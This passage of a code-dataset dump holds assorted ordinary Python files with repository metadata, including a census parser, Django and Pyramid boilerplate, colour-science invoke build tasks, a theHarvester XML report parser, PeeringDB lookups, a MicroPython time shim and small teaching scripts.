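    return ((end + 1) // 2) ** 2 - (start // 2) ** 2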
| [
"[email protected]"
] | |
93106b10ac49c4459a2aba027ec3a84d8b8ae976 | ebb4b093fe5b0f1d806ad5b566d80eee0a63148e | /citydata/parse_census.py | a653771485315e3e460da679736118e3599a332a | [] | no_license | kris-samala/LBSN | b8d8e8660afed0e67870ba31ee9532dde72d3f4e | 9005e66df22cb2fb7ff8da64baddbb399e8c975c | refs/heads/master | 2020-12-24T13:36:00.649302 | 2012-06-07T06:27:10 | 2012-06-07T06:27:10 | 3,608,883 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 915 | py | import sys
import fileinput
import pickle
#python parse_census.py [state_abbr] [census_raw] census.out
out = open(sys.argv[3], 'wb')
census = {}
state_abb = {}
if len(sys.argv) < 4:
print "Filename required."
else:
for line in fileinput.input(sys.argv[1]):
line = line.split(',')
state_abb[line[0]] = line[1]
for line in fileinput.input(sys.argv[2]):
line = line.split(',')
city = line[2].lstrip('"')
city = city.replace('city','').replace('village','').replace('CDP','').replace('town','').replace('municipality','').replace('zona urbana','').rstrip()
state = line[3].lstrip().rstrip('"')
state = state_abb[state].rstrip()
pop = line[4]
loc = city + "," + state
census[loc] = int(pop)
for l in census:
out.write(l + " = " + str(census[l]) + "\n")
out.close()
pickle.dump(census, open('census.p', 'wb'))
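# Readback sketch (added): keys use the "<city>,<state_abbr>" format built above.
#   census = pickle.load(open('census.p', 'rb'))
#   census.get('Chicago,IL')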
| [
"[email protected]"
] | |
ed2d0c4a5ef120704b2f17e4f84a75fac344740a | 6c53b41340bcacd08b2cbb01214f20beab27fe6b | /env/bin/symilar | db333a323b6132593cc12b208bbc4246dfe55f95 | [
"MIT"
] | permissive | daydroidmuchiri/News-Highlight | 8a9e71ed284622d78a1bdff0e1d4fc26bc999c89 | ab7a9ea7bd29c8ca37e8f923af310999fd4cecde | refs/heads/master | 2021-06-24T17:32:37.913494 | 2019-10-22T07:41:03 | 2019-10-22T07:41:03 | 214,965,319 | 0 | 0 | null | 2021-03-20T02:00:37 | 2019-10-14T06:31:26 | Python | UTF-8 | Python | false | false | 275 | #!/home/daniel/Desktop/python/projects/co/news-highlight/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pylint import run_symilar
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run_symilar())
| [
"[email protected]"
] | ||
b8d0505385eafd32d112698612fb8469b9c0428a | f06336d8ffcc6028679dff525c60f056f0436e92 | /ChatAj/ChatAj/asgi.py | c257802471be095579816096409cebce83be6805 | [] | no_license | AngelJadan/Primeras-Practicas-con-django | 440fc7efe9c6e49274294765714703ab1c936f8c | fe89c57b16eddb5dcce131212ac5dc3035f41303 | refs/heads/main | 2023-08-19T16:32:19.854395 | 2021-10-14T19:54:51 | 2021-10-14T19:54:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for ChatAj project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ChatAj.settings')
application = get_asgi_application()
| [
"[email protected]"
] | |
468a0df45f7aa90ff9775925bbb385b03026e242 | e271c9699d07f4b627ac4cf71b4bb4c233af2eb1 | /packassembler/tests/base.py | 16139e28f40f950802e6ff24fb9993d5d3a3ac3e | [
"Apache-2.0"
] | permissive | PackAssembler/PackAssembler | 379912ff59a00797a35e70ce51ac5cfc7db3b3fc | 284a5f31ec2f05f71fe30397a6da069a0a8cb45f | refs/heads/master | 2016-09-05T17:26:21.017491 | 2014-07-07T13:09:13 | 2014-07-07T13:09:13 | 11,825,806 | 0 | 1 | null | 2014-04-22T03:07:13 | 2013-08-01T19:30:34 | Python | UTF-8 | Python | false | false | 1,119 | py | from pyramid import testing
from copy import copy
class DummyRequest(testing.DummyRequest):
session = {}
def flash(self, msg):
self.session['flash'] = [msg]
def flash_error(self, msg):
self.session['error_flash'] = [msg]
class BaseTest:
def _get_test_class(self):
pass
def make_one(self, *args, **kw):
return self._get_test_class()(*args, **kw)
@classmethod
def setup_class(cls):
cls.config = testing.setUp()
cls.config.include('packassembler')
cls.config.include('pyramid_mailer.testing')
@classmethod
def teardown_class(cls):
testing.tearDown()
def authenticate(self, user):
self.config.testing_securitypolicy(userid=user.username)
def match_request(params=None, **kwargs):
return DummyRequest(matchdict=kwargs, params=params)
def create_rid(name):
return name.replace(' ', '_')
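# e.g. create_rid("My Test Pack") -> "My_Test_Pack"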
def document_to_data(doc):
data = copy(doc._data)
data['submit'] = ''
filtered = {}
for k, v in data.items():
if v is not None:
filtered[k] = v
return filtered
| [
"[email protected]"
] | |
e7b6ed30d1d3b6ae95bd07204d6d545021943528 | a3ffecad8d176142f0f9b7504503365b8e64bd69 | /turtle2/n2.py | 2bd41ffc2fb2ecbcdad4ab57df34e1a505316357 | [] | no_license | dumb-anchovy/mipt_python_1sem | 517a497d879be1f32530c023af2a9481430c024f | 76d4f378ff74345ac3107d42ce16a68cc5d2e46f | refs/heads/main | 2023-08-27T16:48:18.210559 | 2021-11-02T11:25:17 | 2021-11-02T11:25:17 | 410,534,058 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,199 | py | import turtle as t
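# Note (added): each aN list encodes digit N as (dx, dy) stroke offsets on a
# roughly 40x80 grid; ch() below moves with the pen up for the first and last pairs.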
a0 = [0, 0, 40, 0, 0, -80, -40, 0, 0, 80, 0, 0]
a1 = [0, -40, 40, 40, 0, -80, -40, 80]
a2 = [0, 0, 40, 0, 0, -40, -40, -40, 40, 0, -40, 80]
a3 = [0, 0, 40, 0, -40, -40, 40, 0, -40, -40, 0, 80]
a4 = [0, 0, 0, -40, 40, 0, 0, -40, 0, 80, -40, 0]
a5 = [40, 0, -40, 0, 0, -40, 40, 0, 0, -40, -40, 0, 0, 80]
a6 = [40, 0, -40, -40, 0, -40, 40, 0, 0, 40, -40, 0, 0, 40]
a7 = [0, 0, 40, 0, -40, -40, 0, -40, 0, 80]
a8 = [0, 0, 40, 0, 0, -40, -40, 0, 0, -40, 40, 0, 0, 40, -40, 0, 0, 40, 0, 0]
a9 = [0, -80, 40, 40, 0, 40, -40, 0, 0, -40, 40, 0, -40, 40]
al = [a0, a1, a2, a3, a4, a5, a6, a7, a8, a9]
def ch(a):
x = t.xcor()
y = t.ycor()
for n in range(0, len(a), 2):
if (n == 0) or (n == len(a) - 2):
x += a[n]
y += a[n + 1]
t.penup()
t.goto(x, y)
t.pendown()
else:
x += a[n]
y += a[n + 1]
t.goto(x, y)
x = -370
y = 0
t.penup()
t.goto(x, y)
t.pendown()
# Draw the number 141700, one digit per loop iteration
k = [1, 4, 1, 7, 0, 0]
for j in k:
ch(al[j])
x = t.xcor()
y = t.ycor()
t.penup()
t.goto(x + 80, y)
t.pendown()
t.exitonclick()
| [
"[email protected]"
] | |
489be89dfb47f43097ad446f460e1cbd05328464 | 2cfe527e8a5d9c44aa0f83574b1016ec35755446 | /PyFunnels/PyF_theharvester.py | 4b3c10eeaa1b0b57eb4a4a85d46a07744ac7e1e2 | [
"MIT"
] | permissive | polling-repo-continua/PyFunnels | e3d7a6a89d0369914f5b7ca160c16ea9ebe025c6 | f8089c3c39248eb1ef97f2681c43f76f55a07900 | refs/heads/master | 2022-02-14T12:07:09.866528 | 2019-08-13T17:52:07 | 2019-08-13T17:52:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,056 | py | import xml.etree.ElementTree as ET
class PyFtheHarvester:
    """Parse a theHarvester XML report into domain, IP and e-mail lists."""
    CAPABILITIES = ['domains', 'ips', 'emails']
def __init__(self,
file,
list_domains = [],
list_ips = [],
list_emails = []
):
self.file = file
self.list_domains = list_domains
self.list_ips = list_ips
self.list_emails = list_emails
self.tree = ET.parse(self.file)
self.root = self.tree.getroot()
def domains(self):
for d in self.root.findall('host'):
domain = d.find('hostname').text
if domain not in self.list_domains:
self.list_domains.append(domain)
def ips(self):
for i in self.root.findall('host'):
ip = i.find('ip').text
if ip not in self.list_ips:
self.list_ips.append(ip)
def emails(self):
for e in self.root.findall('email'):
email = e.text
if email not in self.list_emails:
                self.list_emails.append(email)
| [
"[email protected]"
] | |
3aea4843be237c4dcdce35ea871082ef159c6872 | b9029f7e08bb93c435290e9e01dba3507714bafc | /tasks.py | a64b8ddab455bd356781035556f67836cb43532a | [
"BSD-3-Clause"
] | permissive | njwardhan/colour | 3a4bf7994e25f02e15aa16bc03d35d7f6cc61a50 | 60679360c3990bc549b5f947bfeb621383e18b5e | refs/heads/master | 2022-09-29T06:17:36.380542 | 2020-01-25T05:10:15 | 2020-01-25T05:10:15 | 253,715,920 | 0 | 0 | null | 2020-04-07T07:14:32 | 2020-04-07T07:14:31 | null | UTF-8 | Python | false | false | 13,629 | py | # -*- coding: utf-8 -*-
"""
Invoke - Tasks
==============
"""
from __future__ import unicode_literals
import sys
try:
import biblib.bib
except ImportError:
pass
import fnmatch
import os
import re
import toml
import uuid
from invoke import task
import colour
from colour.utilities import message_box
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2020 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '[email protected]'
__status__ = 'Production'
__all__ = [
'APPLICATION_NAME', 'APPLICATION_VERSION', 'PYTHON_PACKAGE_NAME',
'PYPI_PACKAGE_NAME', 'BIBLIOGRAPHY_NAME', 'clean', 'formatting', 'tests',
'quality', 'examples', 'preflight', 'docs', 'todo', 'requirements',
'build', 'virtualise', 'tag', 'release', 'sha256'
]
APPLICATION_NAME = colour.__application_name__
APPLICATION_VERSION = colour.__version__
PYTHON_PACKAGE_NAME = colour.__name__
PYPI_PACKAGE_NAME = 'colour-science'
BIBLIOGRAPHY_NAME = 'BIBLIOGRAPHY.bib'
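# Typical invocations from a shell, assuming the standard ``invoke`` runner
# (illustrative examples, not part of the original file):
#
#     invoke clean --no-docs
#     invoke tests
#     invoke build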
@task
def clean(ctx, docs=True, bytecode=False):
"""
Cleans the project.
Parameters
----------
ctx : invoke.context.Context
Context.
docs : bool, optional
Whether to clean the *docs* directory.
bytecode : bool, optional
Whether to clean the bytecode files, e.g. *.pyc* files.
Returns
-------
bool
Task success.
"""
message_box('Cleaning project...')
patterns = ['build', '*.egg-info', 'dist']
if docs:
patterns.append('docs/_build')
patterns.append('docs/generated')
if bytecode:
patterns.append('**/*.pyc')
for pattern in patterns:
ctx.run("rm -rf {}".format(pattern))
@task
def formatting(ctx, yapf=False, asciify=True, bibtex=True):
"""
Formats the codebase with *Yapf*, converts unicode characters to ASCII and
cleanup the "BibTeX" file.
Parameters
----------
ctx : invoke.context.Context
Context.
yapf : bool, optional
Whether to format the codebase with *Yapf*.
asciify : bool, optional
Whether to convert unicode characters to ASCII.
bibtex : bool, optional
Whether to cleanup the *BibTeX* file.
Returns
-------
bool
Task success.
"""
if yapf:
message_box('Formatting codebase with "Yapf"...')
ctx.run('yapf -p -i -r --exclude \'.git\' .')
if asciify:
message_box('Converting unicode characters to ASCII...')
with ctx.cd('utilities'):
ctx.run('./unicode_to_ascii.py')
if bibtex and sys.version_info[:2] >= (3, 2):
message_box('Cleaning up "BibTeX" file...')
bibtex_path = BIBLIOGRAPHY_NAME
with open(bibtex_path) as bibtex_file:
bibtex = biblib.bib.Parser().parse(
bibtex_file.read()).get_entries()
for entry in sorted(bibtex.values(), key=lambda x: x.key):
try:
del entry['file']
except KeyError:
pass
for key, value in entry.items():
entry[key] = re.sub('(?<!\\\\)\\&', '\\&', value)
with open(bibtex_path, 'w') as bibtex_file:
for entry in bibtex.values():
bibtex_file.write(entry.to_bib())
bibtex_file.write('\n')
@task
def tests(ctx, nose=True):
"""
Runs the unit tests with *Nose* or *Pytest*.
Parameters
----------
ctx : invoke.context.Context
Context.
nose : bool, optional
Whether to use *Nose* or *Pytest*.
Returns
-------
bool
Task success.
"""
if nose:
message_box('Running "Nosetests"...')
ctx.run(
'nosetests --with-doctest --with-coverage --cover-package={0} {0}'.
format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
else:
message_box('Running "Pytest"...')
ctx.run(
'py.test --disable-warnings --doctest-modules '
'--ignore={0}/examples {0}'.format(PYTHON_PACKAGE_NAME),
env={'MPLBACKEND': 'AGG'})
@task
def quality(ctx, flake8=True, rstlint=True):
"""
Checks the codebase with *Flake8* and lints various *restructuredText*
files with *rst-lint*.
Parameters
----------
ctx : invoke.context.Context
Context.
flake8 : bool, optional
Whether to check the codebase with *Flake8*.
rstlint : bool, optional
Whether to lint various *restructuredText* files with *rst-lint*.
Returns
-------
bool
Task success.
"""
if flake8:
message_box('Checking codebase with "Flake8"...')
ctx.run('flake8 {0} --exclude=examples'.format(PYTHON_PACKAGE_NAME))
if rstlint:
message_box('Linting "README.rst" file...')
ctx.run('rst-lint README.rst')
@task
def examples(ctx, plots=False):
"""
Runs the examples.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to skip or only run the plotting examples: This a mutually
exclusive switch.
Returns
-------
bool
Task success.
"""
message_box('Running examples...')
for root, _dirnames, filenames in os.walk(
os.path.join(PYTHON_PACKAGE_NAME, 'examples')):
for filename in fnmatch.filter(filenames, '*.py'):
if not plots and ('plotting' in root or
'examples_interpolation' in filename or
'examples_contrast' in filename):
continue
if plots and ('plotting' not in root and
'examples_interpolation' not in filename and
'examples_contrast' not in filename):
continue
ctx.run('python {0}'.format(os.path.join(root, filename)))
@task(formatting, tests, quality, examples)
def preflight(ctx):
"""
Performs the preflight tasks, i.e. *formatting*, *tests*, *quality*, and
*examples*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Finishing "Preflight"...')
@task
def docs(ctx, plots=True, html=True, pdf=True):
"""
Builds the documentation.
Parameters
----------
ctx : invoke.context.Context
Context.
plots : bool, optional
Whether to generate the documentation plots.
html : bool, optional
Whether to build the *HTML* documentation.
pdf : bool, optional
Whether to build the *PDF* documentation.
Returns
-------
bool
Task success.
"""
if plots:
with ctx.cd('utilities'):
message_box('Generating plots...')
ctx.run('./generate_plots.py')
with ctx.prefix('export COLOUR_SCIENCE_DOCUMENTATION_BUILD=True'):
with ctx.cd('docs'):
if html:
message_box('Building "HTML" documentation...')
ctx.run('make html')
if pdf:
message_box('Building "PDF" documentation...')
ctx.run('make latexpdf')
@task
def todo(ctx):
"""
Export the TODO items.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "TODO" items...')
with ctx.cd('utilities'):
ctx.run('./export_todo.py')
@task
def requirements(ctx):
"""
Export the *requirements.txt* file.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Exporting "requirements.txt" file...')
ctx.run('poetry run pip freeze | '
'egrep -v "github.com/colour-science|enum34" '
'> requirements.txt')
@task(clean, preflight, docs, todo, requirements)
def build(ctx):
"""
Builds the project and runs dependency tasks, i.e. *docs*, *todo*, and
*preflight*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Building...')
pyproject_content = toml.load('pyproject.toml')
pyproject_content['tool']['poetry']['name'] = PYPI_PACKAGE_NAME
pyproject_content['tool']['poetry']['packages'] = [{
'include': PYTHON_PACKAGE_NAME,
'from': '.'
}]
with open('pyproject.toml', 'w') as pyproject_file:
toml.dump(pyproject_content, pyproject_file)
ctx.run('poetry build')
ctx.run('git checkout -- pyproject.toml')
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('cp {0}-{1}/setup.py ../'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('rm -rf {0}-{1}'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
with open('setup.py') as setup_file:
source = setup_file.read()
setup_kwargs = []
def sub_callable(match):
setup_kwargs.append(match)
return ''
template = """
setup({0}
)
"""
source = re.sub(
'setup_kwargs = {(.*)}.*setup\\(\\*\\*setup_kwargs\\)',
sub_callable,
source,
flags=re.DOTALL)[:-2]
setup_kwargs = setup_kwargs[0].group(1).splitlines()
for i, line in enumerate(setup_kwargs):
setup_kwargs[i] = re.sub('^\\s*(\'(\\w+)\':\\s?)', ' \\2=', line)
if setup_kwargs[i].strip().startswith('long_description'):
setup_kwargs[i] = (
' long_description=open(\'README.rst\').read(),')
source += template.format('\n'.join(setup_kwargs))
with open('setup.py', 'w') as setup_file:
setup_file.write(source)
@task
def virtualise(ctx, tests=True):
"""
Create a virtual environment for the project build.
Parameters
----------
ctx : invoke.context.Context
Context.
tests : bool, optional
Whether to run tests on the virtual environment.
Returns
-------
bool
Task success.
"""
unique_name = '{0}-{1}'.format(PYPI_PACKAGE_NAME, uuid.uuid1())
with ctx.cd('dist'):
ctx.run('tar -xvf {0}-{1}.tar.gz'.format(PYPI_PACKAGE_NAME,
APPLICATION_VERSION))
ctx.run('mv {0}-{1} {2}'.format(PYPI_PACKAGE_NAME, APPLICATION_VERSION,
unique_name))
with ctx.cd(unique_name):
ctx.run('poetry env use 3')
ctx.run('poetry install --extras "optional plotting"')
ctx.run('source $(poetry env info -p)/bin/activate')
ctx.run('python -c "import imageio;'
'imageio.plugins.freeimage.download()"')
if tests:
ctx.run('poetry run nosetests', env={'MPLBACKEND': 'AGG'})
@task
def tag(ctx):
"""
Tags the repository according to defined version using *git-flow*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Tagging...')
result = ctx.run('git rev-parse --abbrev-ref HEAD', hide='both')
assert result.stdout.strip() == 'develop', (
'Are you still on a feature or master branch?')
with open(os.path.join(PYTHON_PACKAGE_NAME, '__init__.py')) as file_handle:
file_content = file_handle.read()
major_version = re.search("__major_version__\\s+=\\s+'(.*)'",
file_content).group(1)
minor_version = re.search("__minor_version__\\s+=\\s+'(.*)'",
file_content).group(1)
change_version = re.search("__change_version__\\s+=\\s+'(.*)'",
file_content).group(1)
version = '.'.join((major_version, minor_version, change_version))
result = ctx.run('git ls-remote --tags upstream', hide='both')
remote_tags = result.stdout.strip().split('\n')
tags = set()
for remote_tag in remote_tags:
tags.add(
remote_tag.split('refs/tags/')[1].replace('refs/tags/', '^{}'))
tags = sorted(list(tags))
assert 'v{0}'.format(version) not in tags, (
'A "{0}" "v{1}" tag already exists in remote repository!'.format(
PYTHON_PACKAGE_NAME, version))
ctx.run('git flow release start v{0}'.format(version))
ctx.run('git flow release finish v{0}'.format(version))
@task(clean, build)
def release(ctx):
"""
Releases the project to *Pypi* with *Twine*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Releasing...')
with ctx.cd('dist'):
ctx.run('twine upload *.tar.gz')
ctx.run('twine upload *.whl')
@task
def sha256(ctx):
"""
Computes the project *Pypi* package *sha256* with *OpenSSL*.
Parameters
----------
ctx : invoke.context.Context
Context.
Returns
-------
bool
Task success.
"""
message_box('Computing "sha256"...')
with ctx.cd('dist'):
ctx.run('openssl sha256 {0}-*.tar.gz'.format(PYPI_PACKAGE_NAME))
| [
"[email protected]"
] | |
0800aa7da0792d7332654f3ccb4b3ad85fd99712 | 59216c8fa10e1b35b6defecd0d103cb29413a4b3 | /stupyde/fixes/utime.py | 770d09f1dd24cec15d64c648ddf3db69ee16d05b | [
"MIT"
] | permissive | pmp-p/stupyde | d0ca43e1ea5dbec6ce074afc301df6f40985d2e3 | 725bfc790999589c20fb2eea5dc75e03fc5d7ff4 | refs/heads/master | 2021-07-18T03:44:13.272593 | 2020-05-10T04:56:57 | 2020-05-10T04:56:57 | 152,827,405 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 879 | py | import time as _time
import sys  # required by the version check below; missing from the original shim
MICROPY_PY_UTIME_TICKS_PERIOD = 2**30
if sys.version_info[0:2] > (3, 7):
    # Python 3.8+ removed time.clock(), so expose process_time() as clock().
_PASSTHRU = ("time", "sleep", "process_time", "localtime")
def clock():
return _time.process_time()
else:
_PASSTHRU = ("time", "sleep", "clock", "localtime")
for f in _PASSTHRU:
globals()[f] = getattr(_time, f)
def sleep_ms(t):
_time.sleep(t / 1000)
def sleep_us(t):
_time.sleep(t / 1000000)
def ticks_ms():
return int(_time.time() * 1000) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)
def ticks_us():
return int(_time.time() * 1000000) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)
ticks_cpu = ticks_us
def ticks_add(t, delta):
return (t + delta) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)
def ticks_diff(a, b):
return ((a - b + MICROPY_PY_UTIME_TICKS_PERIOD // 2) & (MICROPY_PY_UTIME_TICKS_PERIOD - 1)) - MICROPY_PY_UTIME_TICKS_PERIOD // 2
del f
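if __name__ == "__main__":
    # Minimal self-check sketch (not in the original shim): ticks_diff() must
    # handle wrap-around of the 2**30 tick counter.
    start = ticks_ms()
    sleep_ms(10)
    print("elapsed ms:", ticks_diff(ticks_ms(), start))
    print("wrapped diff:", ticks_diff(5, MICROPY_PY_UTIME_TICKS_PERIOD - 5))  # -> 10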
| [
"[email protected]"
] | |
94a4be74fbb2627846ed9d68f324dbf2a692b318 | f749d098555c7be9e1693aab470ed260779baf1e | /函数/main.py | c6d78391b84e124ffaa1df7dcb2585cd93198ef4 | [] | no_license | es716/study-Python | 77ece1828aec0d383c5376eddcf4b7bc593c53c1 | 3a7879e23468f981801ee4428583e0cd13848b08 | refs/heads/master | 2021-01-11T00:20:56.205252 | 2016-10-11T04:08:05 | 2016-10-11T04:08:05 | 70,545,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#==============================================
from test import my_abs,power,add_end,calc,person,person1,person2
names = [1, 2, 3]
print(my_abs(-90))
print (power(25, 5))
print (power(25))
print (add_end())
print (add_end())
print (calc(1,2,3))
print (calc())
print (calc(*names))
person('es',16)
person('es',16,country='China')
person('es',16,country='China',city='Beijing')
person1('es',16,city='Beijing',job = 'studence')
#person1('Jack', 24, 'Beijing', 'Engineer')
person2('es',16,city='Beijing',job = 'studence')
person2('es',16)
'''
Fetch a web page
import urllib.request
def getHtml(url):
page = urllib.request.urlopen(url)
html = page.read()
return html.decode('UTF-8')
html = getHtml("https://movie.douban.com/")
print (html)
'''
| [
"[email protected]"
] | |
8255c837aa16fadcba7eb5b77f8cdb00c4d40c4e | 6b97237bfd9647f7a90c1d1c33b4453c07e56839 | /routingpolicy/peeringdb.py | 1785b3738e64605815f3565b2ae6a6f5cfd0589e | [
"MIT"
] | permissive | 48ix/routingpolicy | 4e9803659daf84478e3bf41db90a8df642fb50e8 | fd3e9547a5c54bd78ee2144786f6b30fdf41d7ef | refs/heads/master | 2023-01-30T03:20:37.440933 | 2020-12-16T17:19:39 | 2020-12-16T17:19:39 | 295,359,872 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,392 | py | """Get Participant Information via the PeeringDB API."""
# Standard Library
from typing import Tuple, Sequence
# Third Party
from httpx import AsyncClient
# Project
from routingpolicy.log import log
async def max_prefixes(asn: int) -> Tuple[int, int]:
"""Search PeeringDB for an entry matching an ASN and return its max prefixes."""
prefixes = (200, 20)
async with AsyncClient(
http2=True,
verify=True,
base_url="https://peeringdb.com",
headers={"Accept": "application/json"},
) as client:
log.debug("Getting max prefixes for AS{}", str(asn))
res = await client.get("/api/net", params={"asn__contains": asn})
res.raise_for_status()
for data in res.json()["data"]:
if "asn" in data and data["asn"] == asn:
log.debug("Matched AS{} to {}", str(asn), data["name"])
log.debug(
"AS{} PeeringDB Org ID {}, last updated {}",
str(asn),
str(data["org_id"]),
data["updated"],
)
prefixes = (
data.get("info_prefixes4", 200),
data.get("info_prefixes6", 20),
)
return prefixes
async def get_as_set(asn: str) -> Sequence[str]:
"""Search PeeringDB for an entry matching an ASN and return its IRR AS_Set."""
result = []
async with AsyncClient(
http2=True,
verify=True,
base_url="https://peeringdb.com",
headers={"Accept": "application/json"},
) as client:
log.debug("Getting max prefixes for AS{}", asn)
res = await client.get("/api/net", params={"asn__contains": asn})
res.raise_for_status()
for data in res.json()["data"]:
if "asn" in data and str(data["asn"]) == asn:
log.debug("Matched AS{} to {}", str(asn), data["name"])
log.debug(
"AS{} PeeringDB Org ID {}, last updated {}",
str(asn),
str(data["org_id"]),
data["updated"],
)
as_set = data.get("irr_as_set", "")
if as_set != "":
result = as_set.split(" ")
log.debug("Found AS-Set(s) {} for {}", result, data["name"])
break
return result
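if __name__ == "__main__":
    # Ad-hoc demo (not part of the original module). AS64496 is a
    # documentation ASN, so the hard-coded defaults are the expected result.
    import asyncio

    async def _demo() -> None:
        print(await max_prefixes(64496))
        print(await get_as_set("64496"))

    asyncio.run(_demo())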
| [
"[email protected]"
] | |
abdf9a3a6958959db50b3339852f2f49dff0d58a | cf57c29736ff6841b0024740201f7fe5dc9430da | /amiibo_comments/wsgi.py | f7000b8488316dbcb8098eccde6cf68555a4ee81 | [] | no_license | zedsousa/amiibo_comments | 9e224da4e1b48171536ba6919bf47527f940632e | 7254f4feb7cd61b38d7036e27a84b18169379abd | refs/heads/main | 2023-07-08T04:38:37.551955 | 2021-08-16T00:34:34 | 2021-08-16T00:34:34 | 396,533,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
WSGI config for amiibo_comments project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'amiibo_comments.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
faf52cb7ec3df25b917e3e95f90c424dd7835be9 | 6c516e6bfb610209b82fd5b97b8cc56613d46813 | /day8/dict01.py | cad85366580f9596c59e34bb69c6e77cbbc0226a | [] | no_license | Eric-cv/QF_Python | 7497d1629d24b78aad141d42de5a28b00da207a4 | 8832faaf63e6fbaaeb2d50befa53d86547c31042 | refs/heads/master | 2022-06-16T21:34:48.077318 | 2020-05-11T11:57:03 | 2020-05-11T11:57:03 | 263,021,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,271 | py | # dictionary 字典
'''
Example application:
    Diaochan    --- ['Dragon-Slaying Sabre', 'Grenade']            800
    Zhuge Liang --- ['Feather Fan', 'Jade Blood Sword', '98k gun'] 300
Dictionary:
    Characteristics:
    1. Symbol: {}
    2. Keyword: dict
    3. Stored elements: key:value pairs
    List     Tuple    Dict
    []       ()       {}
    list     tuple    dict
    ele      ele      key:value  # element
'''
# Definitions
dict1 = {}      # empty dict
dict2 = dict()  # empty dict; compare list() -> empty list, tuple() -> empty tuple
dict3 = {'ID': '220821199601010018', 'name': 'Eric', 'age': 18}
dict4 = dict([('name', 'Eric'), ('age', 18)])  # -> {'name': 'Eric', 'age': 18}
# dict5 = dict([(1, 2, 3), (4, 5), (6, 8), (9, 0)])  # ValueError: three items where two are expected
# Note: a list can be converted to a dict, but only if every element comes in
# pairs, so the dict5 line above is kept commented out as a counter-example.
# CRUD operations on dictionaries
# Add -- syntax: dict[key] = value
# Behaviour: with the syntax above, if the same key already exists in the dict
#            its value is overwritten; if there is no such key, the key:value
#            pair is added to the dict.
dict6 = {}
# Syntax: dict6[key] = value
dict6['brand'] = 'huawei'
print(dict6)  # {'brand': 'huawei'}
dict6['brand'] = 'mi'
dict6['type'] = 'p30 pro'
dict6['price'] = 9000
dict6['color'] = 'black'
print(dict6)
'''
Exercise:
    user registration feature
    username
    password
    email
    phone
'''
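# One possible solution sketch for the exercise above (my assumption, not an
# official answer): keep every registered user in a dict keyed by username.
users = {}
def register(username, password, email, phone):
    if username in users:
        return False  # adding an existing key would overwrite it, so reject duplicates
    users[username] = {'password': password, 'email': email, 'phone': phone}
    return True
print(register('Eric', 'secret', '[email protected]', '123456'))  # True
print(register('Eric', 'other', '[email protected]', '654321'))   # False (duplicate)
print(users)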
| [
"[email protected]"
] | |
9a7a6e1d171bf14644f7c0a4335a2de37ac7d303 | cfb33f980471042e104a928a09c2e23b983b485f | /Subset/binsearch.py | a5b297922a5780e65cf3005ff88eedc028e2e2ec | [] | no_license | shilpchk/NetworkStructure | 22d819ed9bce217f04366b0f61533ef3e135848a | 5ea3126455ccfe5a8e7fc1e40fd08b9bd6f9e921 | refs/heads/master | 2021-01-19T11:09:24.447938 | 2017-04-11T12:55:52 | 2017-04-11T12:55:52 | 87,933,916 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | def binsearch(value, arr, N):
    """Lower-bound binary search: smallest index i in [0, N) with arr[i] >= value (N if none)."""
    low = 0
    high = N
    while low < high:
        mid = low + (high - low) // 2
        if arr[mid] < value:
            low = mid + 1
        else:
            high = mid
    return low
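if __name__ == "__main__":
    # Quick illustrative check (not in the original file): the function returns
    # the insertion point that keeps the array sorted.
    data = [1, 3, 3, 5, 9]
    print(binsearch(3, data, len(data)))   # 1  (first index with value >= 3)
    print(binsearch(4, data, len(data)))   # 3
    print(binsearch(10, data, len(data)))  # 5  (== N when value is past the end)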
| [
"[email protected]"
] | |
